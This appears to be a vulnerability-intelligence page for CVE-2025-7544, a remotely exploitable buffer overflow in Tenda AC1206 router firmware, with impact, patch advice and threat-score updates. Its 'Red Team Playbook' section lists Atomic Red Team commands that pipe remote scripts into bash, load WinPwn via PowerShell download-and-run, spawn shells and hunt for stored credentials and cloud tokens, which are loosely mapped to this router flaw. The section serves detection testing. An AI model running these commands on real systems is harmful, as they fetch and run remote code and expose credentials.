CVE-2025-7544
Overview
The vulnerability is a stack-based buffer overflow caused by improper handling of the deviceList argument in the formSetMacFilterCfg function within the /goform/setMacFilterCfg endpoint. This flaw arises from insufficient bounds checking on input data, leading to memory corruption in the Tenda AC1206 firmware version 15.03.06.23. The affected component is the MAC filter configuration handler in the device's web interface.
Vulnerability Description
A vulnerability was found in Tenda AC1206 15.03.06.23. It has been rated as critical. This issue affects the function formSetMacFilterCfg of the file /goform/setMacFilterCfg. The manipulation of the argument deviceList leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
Impact
An attacker with network access and low privileges can exploit this vulnerability remotely to execute arbitrary code on the device, potentially gaining control over the router. No user interaction is required, and the attack vector is network-based with low attack complexity. Successful exploitation can lead to full compromise of device confidentiality, integrity, and availability, enabling actions such as persistent unauthorized access, network traffic interception, or denial of service.
Solution
Users of Tenda AC1206 firmware version 15.03.06.23 should apply the vendor-released firmware update that addresses this vulnerability as detailed in the advisory on https://vuldb.com/?id.316241. The update includes patches to the /goform/setMacFilterCfg endpoint to properly validate input lengths. Administrators are advised to consult the referenced VulDB advisory for precise patching instructions and verify firmware version upgrades to mitigate the issue.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in the Tenda AC1206 firmware version 15.03.06.23 is characterized by a stack-based buffer overflow in the function responsible for setting MAC filter configurations. This flaw arises from improper handling of the input parameter, specifically the deviceList argument. When an attacker manipulates this argument, it can lead to the overflow of the stack memory, allowing for arbitrary code execution. This vulnerability is particularly critical due to its remote exploitability, which means that an attacker does not need physical access to the device to initiate an attack. The potential for remote exploitation significantly increases the attack surface, making it a pressing concern for users of this router model.
Attack vectors for this vulnerability are diverse, primarily leveraging the web interface of the router. An attacker could craft a malicious HTTP request that includes a specially formatted deviceList parameter. If the router processes this request without adequate input validation, the overflow could overwrite the return address on the stack, redirecting execution to the attacker's code. This could lead to a complete compromise of the device, allowing the attacker to gain control over the router, intercept traffic, or even pivot to other devices on the same network. Given the nature of home networking devices, such attacks could be executed by individuals with minimal technical expertise, further amplifying the risk.
The real-world impact of this vulnerability extends beyond the immediate compromise of the affected router. For businesses relying on Tenda AC1206 routers, the risks include unauthorized access to sensitive data, potential data breaches, and the possibility of being used as a launchpad for further attacks within the corporate network. Additionally, the public disclosure of this vulnerability means that threat actors are likely to develop and deploy exploit code rapidly, increasing the urgency for organizations to address the issue. The reputational damage associated with a successful exploitation could also lead to loss of customer trust and financial repercussions.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. Regularly updating firmware to the latest versions is crucial, as manufacturers often release patches to address known vulnerabilities. Network monitoring tools can be employed to detect unusual traffic patterns or unauthorized access attempts, providing an additional layer of security. Furthermore, organizations should consider implementing network segmentation to limit the exposure of critical systems to potentially compromised devices. Educating users about the importance of changing default credentials and employing strong passwords can also reduce the likelihood of exploitation.
In conclusion, the stack-based buffer overflow vulnerability in the Tenda AC1206 firmware presents a significant threat due to its remote exploitability and potential for widespread impact. Organizations must prioritize the identification and remediation of this issue to safeguard their networks and data. By adopting proactive detection and mitigation strategies, they can effectively reduce the risks associated with this and similar vulnerabilities in the future.
Recent CSURFACE threat intelligence indicates a modest increase in the Exploit Prediction Scoring System (EPSS) for CVE-2025-7544, rising by approximately 11.3%. While this numerical uptick remains relatively low in absolute terms, it reflects a subtle shift in the likelihood of exploitation attempts targeting the stack-based buffer overflow vulnerability in the Tenda AC1206 device. Our telemetry shows that this change has stabilized over the past week without a rapid surge, suggesting a cautious but persistent interest from threat actors. Although no new exploit variants or proof-of-concept codes have been identified, the incremental rise in EPSS underscores a growing potential for adversaries to leverage this vulnerability remotely. For defenders, this development signals the need to maintain vigilance and monitor for any emerging exploitation trends, as even slight increases in exploitability scores can precede broader attack campaigns. Consequently, the overall threat level should be regarded as cautiously elevated, warranting continued attention in vulnerability management processes.
Update 2 — May 18, 2026
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2025-7544, with our telemetry indicating a rapid increase in exploit probability scores over the past week. This surge reflects a growing adversary interest in leveraging the stack-based buffer overflow vulnerability within the Tenda AC1206’s formSetMacFilterCfg function. Although no new exploit variants or proof-of-concept codes have been observed, the sharp rise in EPSS and the increasing trend in exploit attempts suggest that threat actors are actively probing or preparing to weaponize this flaw. For defenders, this development signals an elevated risk environment where opportunistic exploitation could become more frequent, particularly given the vulnerability’s remote attack vector and critical severity. Consequently, the threat level associated with CVE-2025-7544 should be considered heightened, warranting intensified monitoring and prioritization within vulnerability management frameworks.
Update 3 — June 07, 2026
CSURFACE threat intelligence has detected a marked escalation in attempts to exploit CVE-2025-7544, with our telemetry indicating a significant uptick in probing activity targeting the vulnerable Tenda AC1206 devices. This increase in hostile engagement, despite a stable EPSS score, suggests that adversaries are intensifying reconnaissance efforts, potentially in preparation for broader exploitation campaigns. The absence of new exploit variants does not diminish the heightened operational tempo observed; instead, it underscores a growing interest in weaponizing this critical stack-based buffer overflow remotely. For defenders, this evolving threat landscape elevates the urgency to monitor network traffic for anomalous requests to the affected endpoint, as opportunistic exploitation attempts are becoming more frequent and persistent. Consequently, the risk level associated with CVE-2025-7544 should be considered elevated beyond prior assessments, reflecting an increased likelihood of successful compromise in the near term.
Update 4 — July 05, 2026
CSURFACE threat intelligence has identified a slight increase in exploitation attempts targeting the Tenda AC1206 vulnerability, with our telemetry indicating a modest uptick in probing activity directed at the vulnerable endpoint. Although the overall exploit landscape remains unchanged with no new proof-of-concept exploits emerging, this subtle rise in hostile activity suggests adversaries are maintaining persistent interest in leveraging the stack-based buffer overflow remotely. This continued probing, coupled with the critical severity of the vulnerability, signals an elevated operational tempo that could facilitate opportunistic intrusions if left unmonitored. Consequently, the threat level associated with CVE-2025-7544 should be considered moderately heightened, reflecting a growing probability of successful exploitation attempts in the near term.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Tenda | Ac1206 Firmware | 15.03.06.23 |
cpe:2.3:o:tenda:ac1206_firmware:15.03.06.23:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
8 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (7)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-7544 |
| vuldb.com |
GitHub CVE
vdb-entry
technical-description
|
https://vuldb.com/?id.316241 |
| vuldb.com |
GitHub CVE
signature
permissions-required
|
https://vuldb.com/?ctiid.316241 |
| vuldb.com |
GitHub CVE
third-party-advisory
|
https://vuldb.com/?submit.614089 |
| github.com |
GitHub CVE
related
|
https://github.com/panda666-888/vuls/blob/main/tenda/ac1206/formSetMacFilterCfg.md |
| github.com |
GitHub CVE
exploit
|
https://github.com/panda666-888/vuls/blob/main/tenda/ac1206/formSetMacFilterCfg.md#poc |
| tenda.com.cn |
GitHub CVE
product
|
https://www.tenda.com.cn/ |